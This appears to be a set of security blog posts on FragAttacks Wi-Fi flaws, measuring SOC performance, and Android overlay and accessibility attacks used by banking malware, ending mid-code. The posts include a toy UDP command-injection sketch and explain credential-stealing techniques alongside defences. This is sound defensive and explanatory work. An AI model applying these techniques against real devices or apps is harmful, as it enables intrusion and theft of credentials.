  1. Design flaws in the 802.11 (Wi-Fi) standard: these affect all Wi-Fi networks, from WEP to WPA3. They can be abused using three attacks: frame aggregation (CVE-2020-24588), mixed-key attacks against fragmentation (CVE-2020-24587) and fragment cache poisoning (CVE-2020-24586). They affect most Wi-Fi access points (APs) and client devices (ex. IoT devices, mobile phones, personal computers etc.).
  2. Implementation flaws: these affect specific devices (APs or clients). They include all the rest of the FragAttacks CVEs.

Zooming in on the Wi-Fi design flaws (CVE-2020-24586/7/8)

Let’s first start with the possible impacts: what can happen if an attacker successfully exploits one of these flaws. There are two possibilities: traffic injection and traffic exfiltration.

💉 Traffic injection

The attacker can send traffic to a Wi-Fi connected client or an AP without being connected to the Wi-Fi network (i.e. without knowing the Wi-Fi credentials). Both home and enterprise networks can be affected.

The concrete impact of this depends on the device / AP being targeted:

  • if there are vulnerable network services listening on the target, the attacker could attempt to exploit them. For example, if the target is an alarm system and it can receive commands on a UDP port without authentication, the attacker could send a UDP packet disabling the alarm (see our Hacking Connected Home Alarms post for more on attacking alarm systems).
  • if the target supports IPv6, it is possible to redirect its traffic to a malicious server controlled by the attacker by abusing DNS. The attacker might then be able to intercept and manipulate the rest of the victim’s traffic. This could allow them to retrieve credentials, cookies and other confidential information. However, the impact depends on the security of the protocols used. For example, the attack might not be effective if the victim verifies the identity of the server it connects to (ex. an IoT device using certificate pinning for its backend TLS endpoints will not be affected).
  • if the target is an AP, the injected traffic can also be used to punch holes into its NAT, therefore allowing attackers to remotely target devices connected to the AP – in that case, the impact depends once more on the services listening on the targeted device.
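To make the alarm example above concrete, the sketch below plays both sides of such an unauthenticated UDP exchange on loopback. The port (9999) and the "DISARM" command are invented for illustration; a real device would define its own protocol:

```java
import java.net.*;
import java.nio.charset.StandardCharsets;

// Hypothetical sketch: a service that accepts commands over UDP without any
// authentication, and an "attacker" injecting a single datagram into it.
public class UdpInject {
    public static void main(String[] args) throws Exception {
        // The "alarm": listens for commands on an unauthenticated UDP port.
        DatagramSocket alarm = new DatagramSocket(9999, InetAddress.getLoopbackAddress());

        // The "attacker": injects a single datagram; no credentials needed.
        byte[] payload = "DISARM".getBytes(StandardCharsets.UTF_8);
        DatagramSocket attacker = new DatagramSocket();
        attacker.send(new DatagramPacket(payload, payload.length,
                InetAddress.getLoopbackAddress(), 9999));
        attacker.close();

        // The alarm blindly acts on whatever it receives.
        byte[] buf = new byte[64];
        DatagramPacket received = new DatagramPacket(buf, buf.length);
        alarm.receive(received);
        String command = new String(received.getData(), 0, received.getLength(),
                StandardCharsets.UTF_8);
        System.out.println("Alarm received command: " + command);
        alarm.close();
    }
}
```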

🕳 Traffic exfiltration

The attacker can obtain parts of traffic sent by Wi-Fi clients.

It is important to understand that these traffic fragments will not be encrypted on the Wi-Fi level, but can be encrypted on the application level, depending on the protocol used by the client. For example, if the exfiltrated traffic is HTTPS, the attacker will not be able to read it. Therefore, this impacts mostly traffic using plaintext protocols (HTTP, FTP etc.).

It is also important to point out that the attacker might not be able to control with precision which traffic fragments they will receive.


All three attacks have a series of relatively complex requirements to be successfully exploited. We provide a high-level overview of the main ones below.

  • Physical proximity to the Wi-Fi network: the attacker must perform an active Man-in-the-Middle attack against the Wi-Fi network, discussed in detail here. In brief, the attacker duplicates the target network using a network card, jams the original network and forces the targeted client to connect to their clone. They then relay messages between the client and the original AP. This allows them to selectively modify Wi-Fi frames. Note that since the attacker does not have Wi-Fi credentials, the payload of the frames remains encrypted.
  • Trick a client: the attacker must trick a Wi-Fi client in the target network into connecting to a malicious server, so that either the client or the server can generate a malicious IP packet, which the Wi-Fi client or the Wi-Fi AP will encrypt and include in a frame. The attacker needs that frame to trigger the attack: they intercept it using their MitM position and alter it accordingly. Without this technique, the flaws cannot be exploited, since the attacker cannot influence the encrypted payload of the Wi-Fi frames directly. In practice, this can be accomplished through social engineering: for example, sending an email with a malicious link that the victim opens on their computer while connected to the Wi-Fi network. Naturally, this is not possible for clients such as IoT devices.
  • Client sending fragmented frames: for the flaw to be exploited, one of the clients in the Wi-Fi network needs to send fragmented Wi-Fi frames. This is an optimization done by newer devices, so older devices might not allow attackers to trigger the flaw.
  • Specific AP configuration: the AP must be configured to periodically refresh client session keys. This is generally not the case by default, so this requirement is unlikely to be satisfied in most Wi-Fi networks.
  • Valid Wi-Fi credentials: this is a special requirement for attacks against Wi-Fi hotspots that enforce client isolation. CVE-2020-24586 can be used to bypass the isolation and exfiltrate traffic from or inject traffic into other clients, but the attacker needs a pair of Wi-Fi credentials to be connected to the hotspot as well.

Overview of main requirements for CVE-2020-24586/7/8

Depending on the attack, some other conditions might also be necessary: for example, for CVE-2020-24586, the target’s cache must not be cleared regularly and frames must be reassembled in a specific way. This means that some systems are not vulnerable (for example, OpenBSD-based APs are not affected by CVE-2020-24586).

Zooming in on the implementation flaws (rest of CVEs)

The rest of FragAttacks’ CVEs are implementation flaws and can be divided in two subgroups.

1) Flaws simplifying the exploitation of the main Wi-Fi flaws (ex. CVE-2020-26146/7)

These relax some of the technical requirements of the three “base” attacks, making them more practical to exploit against specific devices. However, the impacts and main requirements as explained above (physical proximity, social engineering) remain unchanged.

2) Plaintext injection flaws (ex. CVE-2020-26145)

These are the most interesting! Their only requirement is physical proximity to the target Wi-Fi network. In other words, they allow easy traffic injection – the alarm example discussed above shows why this could be a critical problem in some scenarios.

The vulnerable alarm systems from our Hacking Connected Home Alarm post are prime targets for traffic injection attacks and could be easily disabled by an attacker at close proximity.


The three “base” attacks (CVE-2020-24586/7/8) affect most Wi-Fi devices, but are unlikely to be abused at scale against regular users.

This is because in practice they require a combination of the attacker being physically present near the Wi-Fi network, social engineering and, in some cases, a specific network configuration. We believe the most likely scenarios of abuse concern high-value targets in spear-phishing scenarios.

Some of the implementation flaws, especially those allowing plaintext injection of frames, allow bypassing the social engineering component and injecting packets in protected networks without other requirements, therefore they are more dangerous in practice. However:

  • they are device-specific, meaning that not all devices are affected;
  • they still require the attacker to be in proximity of the target Wi-Fi network;
  • their impact depends on the security of the target (presence of vulnerable services, hardening measures, use of secure protocols like HTTPS etc.).

Aftermath – what can I do?

We leave you with some actions points for regular users, developers and asset owners.

Regular user:

✔ Keep all your devices (home Wi-Fi access point, personal computer, mobile devices, IoT devices) updated. If you are not sure that a device has an automatic update mechanism, check the vendor website or contact them for more information about how updates are performed.

✔ Use a modern, up-to-date web browser.

✔ Do not ignore browser messages warning you about insecure connections.

✔ Be cautious when following links in e-mails and messages.

✔ Avoid connecting to public Wi-Fi hotspots (open hotspots or hotspots with a shared password, like at a coffeeshop).

Developer:


✔ Check with the manufacturer of the device you are using (or with the supplier of the Wi-Fi hardware) for guidance on the impact and remediation of FragAttacks on your platform.

✔ Test your platform using the testing tool provided by Mathy.

✔ Properly secure the services exposed or used by your application. For example: use a secure protocol such as TLS, take advantage of mechanisms such as certificate pinning and enforce proper authentication on all listening services. Don’t hesitate to take a look at the OWASP ISVS for more guidance.

Asset owner (device integrator or IT staff) :

✔ Check with product vendors for guidance and patches against FragAttacks.

✔ If you are responsible for IT security, ensure users are properly educated about phishing and social engineering tactics.

✔ If your infrastructure has support for rogue AP monitoring, ensure it is enabled and alerts are acted upon.

If you still have questions or need help navigating the impact of these attacks, don’t hesitate to get in touch!

About the author

Théo Rigas is an IT Security Consultant at NVISO. His main areas of focus are IoT and embedded device security. He regularly performs Web, Mobile and IoT security assessments for NVISO and contributes to NVISO R&D.

Going beyond traditional metrics: 3 key strategies to measuring your SOC performance

26 May 2021 at 11:59

Establishing a Security Operation Center is a great way to reduce the risk of cyber attacks damaging your organization by detecting and investigating suspicious events derived from infrastructure and network data. In traditionally heavily regulated industries such as banking, the motivation to establish a SOC is often further complemented by regulatory requirements. It is therefore no wonder that SOCs have been and still are on the rise. As for in-house SOCs, "only 30 percent of organizations had this capability in 2017 and 2018, that number jumps to over half (51%)" (DomainTools).

But as usual, increased security and risk reduction comes at a cost, and a SOC’s price tag can be significant. Adding up to the cost of SIEM tools are in-demand cyber security professionals whose salaries reflect their scarcity on the job market, the cost of setting up and maintaining the systems, developing processes and procedures as well as regular trainings and awareness measures.

It is only fair to expect the return on investment to reflect the large sum of money spent – that is for the SOC to run effectively and efficiently in order to secure further funding. But what does that mean?

I would like to briefly discuss a few key points when it comes to properly evaluating a SOC's performance and capabilities. I will refrain from proposing a one-size-fits-all approach, and will instead outline common issues I have encountered and the approach I prefer to avoid them.

I will take into account that – like many security functions – a well-operating SOC can be perceived as a bit of a black box: it prevents large-scale security incidents from occurring, making it seem like the company is not at risk and is spending too much on security. Cost and budget are always important factors in risk management, so the right balance has to be found between providing clear and understandable numbers and sticking to performance indicators that actually signify performance.

The limitations of security by numbers and metrics-based KPIs

To demonstrate performance, metrics and key performance indicators (KPIs) are often employed. A metric is an atomic data point (e.g. the number of tickets an analyst closed in a day), while a KPI sets an expected or acceptable range for a metric to fall into (e.g. each analyst is supposed to close between x and x+y tickets in a day).

The below table from the SANS institute’s 2019 SOC survey conveys that the top 3 metrics used to track and report a SOC’s performance are the number of incidents/cases handled, the time from detection to containment to eradication (i.e. the time from detection to full closure) and the number of incidents/cases closed per shift.

Figure 1- SANS, Common and Best Practices for Security Operations Centers: Results of the 2019 SOC Survey

Metrics are popular because they quantify complex matters into one or several simple numbers. As the report states, "It's easy to count; it's easy to extract this data in an automated fashion; and it's an easy way to proclaim, 'We're doing something!' Or, 'We did more this week than last week!'" (SANS Institute). But busy does not equal secure.

There are 3 main issues that can arise when using metrics and KPIs to measure a SOC’s performance:

  • Picking out metrics commonly associated with a high workload or speed does not ensure that the SOC is actually performing well. This is most apparent with the second-most used metric, the time it takes to fully resolve an incident, as this will vary greatly depending on the complexity of the cases. Complex incidents may take months to actually resolve (including full scoping, containment, communication and lessons learned). Teams should not be punished for being diligent where they should be.
    As a metric, the number of cases handled or closed is an atomic piece of information without much context or meaning to it. Such a data point could be made into a KPI by defining a range the metric would need to fall into to be deemed acceptable. This works well if the expected value range can be foreseen and quantified, as in 'You answered 8 out of 10 questions correctly'. For a SOC, there is no fixed number of cases that will reliably come up each shift.
  • Furthermore, the number of alerts processed and tickets closed can easily be influenced via the detection rule configuration. While generally the “most prominent challenge for any monitoring system—particularly IDSes—is to achieve a high true positive rate” (MITRE), a KPI based on alert volume creates an incentive to work in the opposite direction. As shown below in Figure 2, more advanced detection capabilities will likely reduce the number of alerts generated by the SIEM, allowing analysts to spend more time drilling down on the remaining key alerts and on complementary threat hunting.
Figure 2 – Mitre, Ten Strategies of a World-Class Cybersecurity Operations Center
  • Lessons learned and the respective improvement of the SOC’s capabilities are rarely rewarded with such metrics, resulting in less incentive to perform these essential activities regularly and diligently.

Especially when KPIs are used to evaluate individual people’s performance and eventually affect bonus or promotion decisions, great care must be taken to not create a conflict of interest between reaching an arbitrary target and actually improving the quality of the SOC. Bad KPIs can result in inefficiencies being rewarded and even increase risk.

Metrics and KPIs certainly have their use, but they must be chosen wisely in order to actually indicate risk reduction via the SOC as well as to avoid conflicting incentives.

Below, I will highlight strategies for rethinking KPIs and SOC performance evaluation.

Operating model-based targets

To understand how to evaluate whether the SOC is doing well, it is crucial to focus on the SOC’s purpose. Here, the SOC target operating model is the golden source. A target operating model should be mandatory for each and every SOC, especially in the early stages. It details how the SOC integrates into the organization, why it was established and what it will and will not do. Clearly outlining the purpose of the SOC in the operating model, as well as establishing how the SOC plans to achieve this goal, helps to set realistic and strategically sound measures of performance and success. If you don’t know what goal the SOC is supposed to achieve, how can you measure whether it got there?

One benefit of this approach is that it allows for a more holistic view of what constitutes ‘the SOC’, taking into account the maturity of the SOC as well as the people, processes and technology trinity that makes it up.

A target operating model-based approach will work from the moment a SOC is being established. Which data sources are planned to be onboarded (and why)? How will detection capabilities be linked to risk, e.g. via a mapping to MITRE? Do you want to automate your response activities? These are key milestones that provide value to the SOC and reaching them can be used as indicators of performance especially in the first few years of establishing and running the SOC.

Formulating Objectives and Key Results (OKR)

From the target operating model, you can start deriving objectives and key results (OKRs) for the SOC. The idea of OKRs is to define an objective (what should be accomplished) and associate key results with it that have to be achieved to get there. KPIs can fit into this model by serving as key results, but linking them with an objective makes sure that they are meaningful and help to achieve a strategic goal (Panchadsaram).

The objectives chosen can be either project or operations-oriented. A project-oriented objective can refer to a new capability that is to be added to the SOC, e.g. the integration of SOAR capabilities for automation. The key results for this objective are then a set of milestones to complete, e.g. selecting a tool, creating an automation framework and completing a POC.

KPIs are generally well suited when it comes to daily operations. Envisioning the SOC as a service within the organization can help to define performance-oriented baselines to monitor the SOC’s health as well as to steer operational improvements.

  • While the number of cases handled is not a good measure of efficiency on its own, it would be odd if a SOC did not have a single case in a month or two, so this metric can act as one component of an overall health and plausibility check. If you usually get 15-25 cases each day and suddenly there is radio silence, you may want to check your systems.
  • The total number of cases handled and the number of cases closed per shift can serve to steer operational efficiency by indicating how many analysts the SOC should employ based on the current case volume.

To implement operational KPIs, metrics can be documented over a period of time to be analyzed at the end of a review cycle – e.g. once per quarter – to decide where the SOC has potential for improvement. This way, realistic targets can be defined tailored to the specific SOC.
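As a minimal sketch of this idea (the class name and the two-standard-deviation band are our own choices, not prescribed by the article), a quarter of observed daily case counts can be turned into a plausibility band instead of an arbitrary fixed target:

```java
import java.util.Arrays;

// Derives a plausibility band for daily case volume from observed counts,
// for use as a health check rather than a performance target.
public class CaseVolumeBaseline {

    // Returns {lower, upper} = mean +/- 2 standard deviations, floored at 0.
    static double[] band(int[] dailyCases) {
        double mean = Arrays.stream(dailyCases).average().orElse(0);
        double variance = Arrays.stream(dailyCases)
                .mapToDouble(c -> (c - mean) * (c - mean))
                .average().orElse(0);
        double sd = Math.sqrt(variance);
        return new double[]{Math.max(0, mean - 2 * sd), mean + 2 * sd};
    }

    public static void main(String[] args) {
        // e.g. one review cycle of daily case counts
        int[] observed = {18, 22, 15, 25, 20, 17, 23, 19, 21, 16};
        double[] b = band(observed);
        System.out.printf("Expected range: %.1f - %.1f cases/day%n", b[0], b[1]);
    }
}
```

A day far outside this band is not “bad performance”; it is a trigger to check whether detection systems are still healthy or whether something unusual is going on.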

Testing the SOC’s capabilities

While metrics and milestones can serve as a conceptual indicator of the SOC’s ability to effectively identify and act on security incidents, it is simply impossible to be sure without seeing the SOC’s capabilities applied in an actual incident. You would need to wait for an actual incident to strike, which is not something you can plan, foresee, or even want to happen. In reality, some SOCs may never face a large incident. This means that they either got very lucky, or that they missed something critical. Which of these is true, they will never know. It is very possible to be compromised without knowing.

Purple teaming is a great exercise to see how the SOC is really doing. Purple teaming refers to an activity where the SOC (the ‘blue team’) and penetration testers (the ‘red team’) work together to simulate a realistic attack scenario. The actual execution can vary from a complete surprise test where the red teamers act without instructions, just like a real attacker would, to more defined approaches where specific attack steps are performed in order to confirm if and when they are detected.

When you simulate an attack in this way, you know exactly what the SOC should have detected and what it actually found. If there is a gap, the exercise provides good visibility on where to follow up in improving the SOC’s capabilities. Areas of improvement can range from a missing data source in the SIEM to a lack of training and experience for analysts. There is rarely a better opportunity to cover people, processes and technology in one single practical assessment.

It is important that these tests are not seen as a threat to the SOC, especially if it turns out that the SOC does not detect the red team’s activities. Red teaming may therefore be understood as “a practical response to a complex cultural problem” (DCDC), where an often valuable team-oriented culture revolving around cohesion under stress can “constrain[] thinking, discourage[] people from speaking out or exclude[] alternative perspectives” (DCDC). The whole purpose of the exercise is to identify such blind spots, which, especially when the exercise is conducted for the first time, can be larger than expected. This may discourage some SOC managers from conducting these tests, fearing that the results will make them look bad in front of senior management.

Management should therefore encourage such exercises from an early stage and clearly express what they expect as an outcome: That gaps are closed after a proper assessment, not that no gaps will ever show up. If “done well by the right people using appropriate techniques, red teaming can generate constructive critique of a project, inject broader thinking to a problem and provide alternative perspectives to shape plans” (DCDC).

Conducting such testing early on and on a regular basis (at least once a year) can help improve the SOC’s performance as well as steer investments the right way, eventually saving money for the organization. Budget can be used effectively to close gaps and to set priorities instead of blindly adding capabilities such as tools or data sources that end up underused and eventually discarded.


Establishing and running a SOC is a complex and expensive endeavor that should yield more benefit to a company than a couple of checks on compliance checklists. Unfortunately, classic SOC metrics are often insufficient to indicate actual risk reduction. Worse, metrics can set incentives to work inefficiently, wasting money and providing a false sense of security.

A strategy-focused approach that measures whether the SOC is reaching its targets as an organizational unit, facilitated by a target operating model and complemented by well-defined OKRs and operational KPIs, can be of great benefit in leading the SOC to reduce risk more efficiently.

To really know if the SOC is capable of identifying and responding to incidents, regular tests should be conducted in a purple team manner, starting early on and making them a habit as the SOC improves its maturity.

Sarah Wisbar

Sarah Wisbar is a GCDA and GCFA-certified IT security expert. With several years of experience as a team lead and senior consultant in the financial services sector under her belt, she now manages the NVISO SOC. She likes implementing lean but efficient processes in operations and keeps her eyes on the ever-changing threat landscape to strengthen the SOC’s defenses.


Domaintools: https://www.domaintools.com/content/survey_security_report_card_2019.pdf

SANS Institute: https://www.sans.org/media/analyst-program/common-practices-security-operations-centers-results-2019-soc-survey-39060.pdf

MITRE: https://www.mitre.org/sites/default/files/publications/pr-13-1028-mitre-10-strategies-cyber-ops-center.pdf

DCDC: https://www.act.nato.int/images/stories/events/2011/cde/rr_ukdcdc.pdf

Panchadsaram: https://www.whatmatters.com/resources/difference-between-okr-kpi/

New mobile malware family now also targets Belgian financial apps

11 May 2021 at 15:14

While banking trojans have been around for a very long time now, we have never seen a mobile malware family attack the applications of Belgian financial institutions. Until today…

Earlier this week, the Italy-based security firm Cleafy published an article about a new Android malware family which they dubbed TeaBot. The sample we will take a look at doesn’t use a lot of obfuscation and only has a limited set of features. What is interesting, though, is that TeaBot actually does attack the mobile applications of Belgian financial institutions.

This is quite surprising, since banking trojans typically use a phishing attack to acquire the credentials of unsuspecting victims. Those credentials would be fairly useless against Belgian financial applications, as they all have secure device enrollment and authentication flows which are resilient against phishing attacks.

So let’s take a closer look at how these banking trojans work, how they are actually trying to attack Belgian banking apps and what can be done to protect these apps.


  • Typical banking malware uses a combination of Android accessibility services and overlay windows to construct an elaborate phishing attack
  • Belgian apps are being targeted with basic phishing attacks and keyloggers which should not result in an account takeover

Android Overlay Attacks

There have been numerous articles written on Android Overlay attacks, including a very recent one from F-Secure labs: “How are we doing with Android’s overlay attacks in 2020?” For those who have never heard of it before, let’s start with a small overview.

Drawing on top of other apps through overlays (SYSTEM_ALERT_WINDOW)

The Android OS allows apps to draw on top of other apps after they have obtained the SYSTEM_ALERT_WINDOW permission. There are valid use cases for this, with Facebook Messenger’s chat heads being the typical example. These chat bubbles stay on top of any other application to allow the user to quickly access their conversations without having to go to the Messenger app.

Overlays have two interesting properties: whether or not they are transparent, and whether or not they are interactive. If an overlay is transparent, you will be able to see whatever is underneath the overlay (either another app or the home screen), and if an overlay is interactive, it will register any screen touches, while the app underneath will not. Below you can see two examples of this. On the left, there’s Facebook’s Messenger app, which has many interactive views but also some transparent parts at the top, while on the right you see Twilight, a blue light filter that covers the entire screen in a semi-transparent way without any interactive elements in the overlay. The controls that you do see with Twilight are the actual Twilight app, opened underneath the red overlay.

Until very recently, if the app was installed through the Google Play store (instead of through sideloading or third party app stores), the application automatically received this permission, without even a confirmation dialog for the user! After much abuse by Banking malware that was installed through the Play store, Google has now added an additional manual verification step in the approval process for apps on the Google Play store. If the app wants to have the permission without requesting it from the user, the app will need to request special permission from Google. But of course, an app can still manually request this permission from the user, and Android’s information for this permission looks rather innocent: “This may interfere with your use of other apps”.
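For context, this is roughly how a legitimate app asks for the permission at runtime (a sketch; the method name and REQUEST_OVERLAY request code are our own choices, while the Settings APIs are the standard Android ones):

```java
import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.provider.Settings;

// Checks for and requests the SYSTEM_ALERT_WINDOW permission at runtime
// (API 23+). REQUEST_OVERLAY is an arbitrary request code of our choosing.
class OverlayPermissionHelper {
    static final int REQUEST_OVERLAY = 1001;

    static void requestOverlayPermission(Activity activity) {
        if (!Settings.canDrawOverlays(activity)) {
            // Sends the user to the system settings page for this app,
            // showing only the innocent-sounding description mentioned above.
            Intent intent = new Intent(
                    Settings.ACTION_MANAGE_OVERLAY_PERMISSION,
                    Uri.parse("package:" + activity.getPackageName()));
            activity.startActivityForResult(intent, REQUEST_OVERLAY);
        }
    }
}
```

Note that the user is only shown the generic system dialog; the requesting app fully controls the story it tells beforehand about why the permission is needed.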

The permission is fairly benign in the hands of the Facebook Messenger app or Twilight, but for mobile malware, the ability to draw on top of other apps is extremely interesting. There are a few ways in which you can use this to attack the user:

  1. Create a fake UI on top of a real app that tricks the user into touching specific locations on the screen. Those locations will not be interactive, and will thus propagate the touch to the underlying application. As a result, the user performs actions in the underlying app without realizing it. This is often called Tapjacking.
  2. Create interactive fields on top of key fields of the app in order to harvest information such as usernames and passwords. This would require the overlay to track what is being shown in the app, so that it can correctly align its own buttons and text fields. All in all quite some work, and not often used to attack the user.
  3. Instead of only overlaying specific buttons, the overlay covers the entire app and pretends to be the app. A fully functional app (usually a webview) is shown on top of the targeted app and asks the user for their credentials. This is a full overlay attack.

These are just three possibilities, but there are many more. Researchers from Georgia Tech and UC Santa Barbara have documented different attacks in their paper, which also introduces the Cloak and Dagger attacks explained below.

Before we get into Cloak and Dagger, let’s take a look at a few other dangerous Android permissions first.

Accessibility services

Applications on Android can request the accessibility services permission, which allows them to simulate button presses or interact with UI elements outside of their own application. These apps are very useful to people with disabilities who need a bit of extra help to navigate their smartphone. For example, the Google TalkBack application will read out any UI element that is touched on the screen, and requires a double click to actually register as a button press. An alternative application is the Voice Access app which tags every UI element with a number and allows you to select them by using voice commands.

Left: Giving permission to the TalkBack service. Android clearly indicates the dangers of giving this permission
Middle: TalkBack uses text-to-speech to read the description that the user taps
Right: Voice Access adds a button to each UI control and allows you to click them through voice commands

Both of these applications can read UI elements and perform touches on the user’s behalf. Just like overlay windows, this can be a very nice feature, or very dangerous if abused. Malware could use accessibility services to create a keylogger which collects the input of a text field any time data is entered, or it could press buttons on your behalf to purchase premium features or subscriptions, or even just click advertisements.

So let’s take a quick look at what kind of information becomes available by installing the Screen Logger app. The Screen Logger app is a legitimate application that uses accessibility features to monitor your actions. At the time of writing, the application doesn’t even request INTERNET permission, so it shouldn’t be stealing your data in any way. However, it’s always best to do these tests on a device without sensitive data which you can factory-reset. The application is very basic:

  • Install the accessibility service
  • Click the record button
  • Perform some actions and enter some text
  • Click the stop recording button

The app will then show all the information it has collected. Below are some examples of the information it collected from a test app:

The Screen logger application shows the data that was collected through an accessibility service

When enabling accessibility services, users are actually warned about the dangers of enabling accessibility. This makes it a bit harder to trick the user into granting this permission. More difficult, but definitely not impossible. Applications actually have a lot of control over the information that is shown to the user. Take for example the four screens below, which belong to a malware sample. All of the text indicated with red is under control of the attacker. The first screen shows a popup window asking the user to enable the Google service (which is, of course, the name of the malware’s service), and the next three screens are what the user sees while enabling the accessibility permission.

Tricking users into installing an accessibility service

Even if malware can’t convince the user to give the accessibility permission, there’s still a way to trick them using overlay windows. This approach is exactly what Cloak and Dagger does.

Cloak and Dagger

Cloak and Dagger is best explained through their own video, where they show a combination of overlay attacks and accessibility to install an application that has all permissions enabled. In the video shown below, anything that is red is non-transparent and interactive, while everything that is green or transparent is non-interactive and will let touches go through to the app underneath.

Now, over the past few years, Android has made efforts to hinder these kinds of attacks. For example, on newer versions of Android, it’s not possible to configure accessibility settings while an overlay is active, and Android automatically disables any overlays when the user enters the Accessibility settings page. Unfortunately, this only prevents a malware sample from giving itself accessibility permissions through overlays; it still allows malware to use social engineering tactics to trick users into enabling them.

Read SMS permission

Finally, another interesting permission for malware is the RECEIVE_SMS permission, which allows an application to read received SMS messages. While this can definitely be used to invade the user’s privacy, the main reason for malware to acquire this permission is to intercept 2FA tokens which are unfortunately often still sent through SMS. Next to SIM-swapping attacks and attacks against the SS7 infrastructure, this is another way in which those tokens can be stolen.

This permission is pretty self-explanatory and a typical user will probably not grant the permission to a game that they just installed. However, by using phishing, overlays or accessibility attacks, malware can make sure the user accepts the permission.

Does this mean your device is fully compromised? Yes, and no.

Given the very intrusive nature of the attacks described above, it’s not a stretch to say that your device is fully compromised. If malware can access what you see, monitor what you do and perform actions on your behalf, they’re basically using your device just like you would. However, the malware is still (ab)using legitimate functionality provided by the OS, and that does come with restrictions.

For example, even applications with full accessibility permissions aren’t able to access data that is stored inside the application container of another app. This means that private information stored within an app is safe, unless you of course access the data through the app and the accessibility service actively collects everything on the screen.

By combining accessibility and overlay windows, it is actually much easier to social engineer the victim and get their credentials or card information. And this is exactly what Banking Trojans often do. Instead of attacking an application and trying to steal their authentication tokens or modify their behavior, they simply ask the user for all the information that’s required to either authenticate to a financial website or enroll a new device with the user’s credentials.

How to protect your app

Protecting against overlays

Protecting your application against a full overlay is, well, impossible. Some research has already been performed on this, and one of the suggestions is to add a visual indicator on the device itself that can inform the user about an overlay attack taking place. Another study took a look at detecting suspicious patterns during app review to identify overlay malware. While the research is definitely interesting, it doesn’t really help you when developing an application.

And even if you could detect an overlay on top of your application, what could your application do? There are a few options, but none of them really work:

  • Close the application > Doesn’t matter, the attack just continues, since there’s a full overlay
  • Show something to the user to warn them > Difficult, since you’re not the top-level view
  • Inform the backend and block the account > Possible, though with many false positives. Imagine customer accounts being blocked because they have Facebook Messenger installed…

What remains is trying to detect an attack and informing your backend. Instead of directly blocking an account, the information could be taken into account when performing risk analysis on a new sign-up or transaction. There are a few ways to collect this information, but all of them can have many false positives:

  • You can detect if a screen has been obscured by handling onFilterTouchEventForSecurity callbacks. There are, however, various edge cases where this doesn’t work as expected, leading to many false negatives and false positives.
  • You can scan for installed applications and check if a suspicious application is installed. This would require you to actively track mobile malware campaigns and update your blacklist accordingly. Given the fact that malware samples often have random package names, this will be very difficult. Additionally, starting with Android 11 (R), it actually becomes impossible to scan for applications which you don’t declare in your Android manifest.
  • You can use accessibility services yourself to monitor which views are created by the Android OS and trigger an error if specific scenarios occur. While this could technically work, it would give people the idea that financial applications do actually require accessibility services, which would play into the hands of malware developers.

The only real feasible implementation is detection through the onFilterTouchEventForSecurity handler, and, given the many false positives, it can only be used in conjunction with other information during a risk assessment.
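A sketch of such a detection, in a custom view of our own naming: onFilterTouchEventForSecurity() and FLAG_WINDOW_IS_OBSCURED are real Android APIs, while reportRiskSignal() is a hypothetical hook into your own telemetry.

```java
import android.content.Context;
import android.util.AttributeSet;
import android.view.MotionEvent;
import android.widget.Button;

// A button that reports touches arriving while another window (possibly a
// malicious overlay) was covering it, instead of silently accepting them.
public class SecureButton extends Button {

    public SecureButton(Context context, AttributeSet attrs) {
        super(context, attrs);
        setFilterTouchesWhenObscured(false); // we inspect the flag ourselves
    }

    @Override
    public boolean onFilterTouchEventForSecurity(MotionEvent event) {
        if ((event.getFlags() & MotionEvent.FLAG_WINDOW_IS_OBSCURED) != 0) {
            // Another window covered this view at the time of the touch.
            // Feed the risk engine rather than blocking outright, because
            // benign overlays (chat heads, blue light filters) trigger this too.
            reportRiskSignal("obscured_touch");
        }
        return super.onFilterTouchEventForSecurity(event);
    }

    private void reportRiskSignal(String type) {
        // hypothetical: send to backend for use in transaction risk scoring
    }
}
```

The signal is noisy by design, which is exactly why the text above recommends using it as one input to a risk assessment rather than a hard block.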

Protecting against accessibility attacks

Unfortunately, the situation here isn’t much better than in the previous section. There are many different settings you can set on views, components and text fields, but all of them are designed to help you improve the accessibility of your application. Removing all accessibility data from your application could help a bit, but this will of course also stop legitimate accessibility software from analyzing your application.

But let’s for a moment assume that we don’t care about legitimate accessibility. How can we make the app as secure as possible to prevent malware from logging our activities? Let’s see…

  • We could set the android:importantForAccessibility attribute of a view component to ‘no’ or ‘noHideDescendants’. This won’t work however, since the accessibility service can just ignore this property and still read everything inside the view component.
  • We could set all the android:contentDescription attributes to “@null”. This will effectively remove all the meta information from the application and will make it much more difficult to track a user. However, any text that’s on screen can still be captured, so the label of a button will still give information about its purpose, even if there is no content description. For input text, the content of the text field will still be available to the malware.
  • We could change every input text to a password field. Password fields are masked and their content isn’t accessible in clear-text format. Depending on the user’s settings, this won’t work either (see next section).
  • Enable FLAG_SECURE on the view. This will prevent screenshots of the view, but it doesn’t impact accessibility services.
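The same options expressed as runtime calls (a sketch; each call is a real Android API, the method name is ours, and each option comes with the caveats noted above):

```java
import android.app.Activity;
import android.text.InputType;
import android.view.View;
import android.view.WindowManager;
import android.widget.EditText;

// Applies the accessibility-hardening options discussed above to a view
// hierarchy. None of these stop a determined accessibility-based keylogger.
class AccessibilityHardening {

    static void apply(Activity activity, View view, EditText editText) {
        // 1. Ask services to skip this subtree (services may simply ignore it)
        view.setImportantForAccessibility(
                View.IMPORTANT_FOR_ACCESSIBILITY_NO_HIDE_DESCENDANTS);
        // 2. Strip metadata; visible text is still readable by services
        view.setContentDescription(null);
        // 3. Mask input; the last-character preview can still leak
        editText.setInputType(InputType.TYPE_CLASS_TEXT
                | InputType.TYPE_TEXT_VARIATION_PASSWORD);
        // 4. Blocks screenshots and screen recording, not accessibility
        activity.getWindow().setFlags(WindowManager.LayoutParams.FLAG_SECURE,
                WindowManager.LayoutParams.FLAG_SECURE);
    }
}
```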

About passwords

By default, Android shows the last entered character in a password field. This is useful for the user as they are able to see if they mistyped something. However, whenever this preview is shown, the value is also accessible to the accessibility services. As a result, we can still steal passwords, as shown in the second and third image below:

Left: A password being entered in ProxyDroid
Middle / Right: The entered password can be reconstructed based on the character previews

It is possible for users to disable this feature by going to Settings > Privacy > Show Passwords, but this setting cannot be manipulated from inside an application.

Detecting accessibility services

If we can’t protect our own application, can we maybe detect an attack? Here is where there’s finally some good news. It is possible to retrieve all the accessibility services running on the device, including their capabilities, through AccessibilityManager.getEnabledAccessibilityServiceList().
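A sketch of such an enumeration: the AccessibilityManager calls are standard Android APIs, while knownGoodServices and reportSuspiciousService() are hypothetical pieces of an allow-list approach.

```java
import android.accessibilityservice.AccessibilityServiceInfo;
import android.content.Context;
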